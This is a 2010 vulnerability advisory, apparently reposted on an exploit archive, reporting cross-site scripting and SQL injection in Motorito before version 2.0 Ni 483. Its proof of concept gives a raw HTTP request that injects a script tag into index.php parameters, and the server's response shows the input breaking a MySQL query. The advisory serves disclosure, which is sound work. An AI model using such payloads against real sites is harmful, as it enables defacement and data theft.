what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Motorito Cross Site Scripting / SQL Injection

Motorito Cross Site Scripting / SQL Injection
Posted Sep 24, 2010
Authored by Mario Diaz Caldera

Motorito versions prior to 2.0 Ni 483 suffer from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 537c7a3cd34ef07caade31c0d8c1f782aa119d2bcc9f73934a52ab27c67c0fa1

Motorito Cross Site Scripting / SQL Injection

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2010-005
- Original release date: March 30th, 2010
- Last revised: September 23th, 2010
- Discovered by: Mario Diaz Caldera
- Severity: 5.5/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
SQL Injection and XSS in Motorito < v2.0 Ni 483

II. BACKGROUND
-------------------------
Motorito is an on-line marketing tool. It is used to manage the
contents of Web Site, create new content, decide which news to put on
the cover, update product catalog, manage the areas of promotion,
manage users, edit the menu items, layout, send e-mails, etc.

III. DESCRIPTION
-------------------------
This bug was found using CENTOS and the last release of Motorito with
Apache 2.2.3 and PHP 5.1.6.

To exploit the vulnerability only is needed use the version 1.0 of the
HTTP protocol to interact with the application, and it is possible to
check that the variables of the module index.php are not properly
filtered.

IV. PROOF OF CONCEPT
-------------------------
GET
/?mmod=>"'><script>alert(4135)</script>&file=>"'><script>alert(4135)</script>
HTTP/1.0
Cookie: PHPSESSID=frdmbbue2fkns0dq33mm1152n3
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: www.testhostwithmotorito.es
Referer: http://www.testhostwithmotorito.es/

HTTP/1.1 200 OK
Content-Length: 361
Date: Fri, 05 Feb 2010 08:53:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL: SELECT parentID
FROM sis_menus WHERE module='>"'><script>alert(4135)</script>' <br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right
syntax to use near '><script>alert(4135)</script>'' at line 1)<br>
Session halted.

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also
possible.

VI. SYSTEMS AFFECTED
-------------------------
Motorito < v2.0 Ni 483

VII. SOLUTION
-------------------------
Upgrade to next version of Motorito. It can be obtained from
http://www.motorito.com
Current version (at advisory publication 2.0 - Ni 891).

VIII. REFERENCES
-------------------------
http://www.motorito.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Mario Diaz Caldera (mdiaz (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 30, 2010: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
February 22, 2010: Discovered by Internet Security Auditors.
June 14, 2010: Sent to the vendor.
Response about revision and inclusion in
Project Plan.
September 23, 2010: Request for update. Response about correction.
September 23, 2010: Sent to public lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are vendor independent provider with a deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close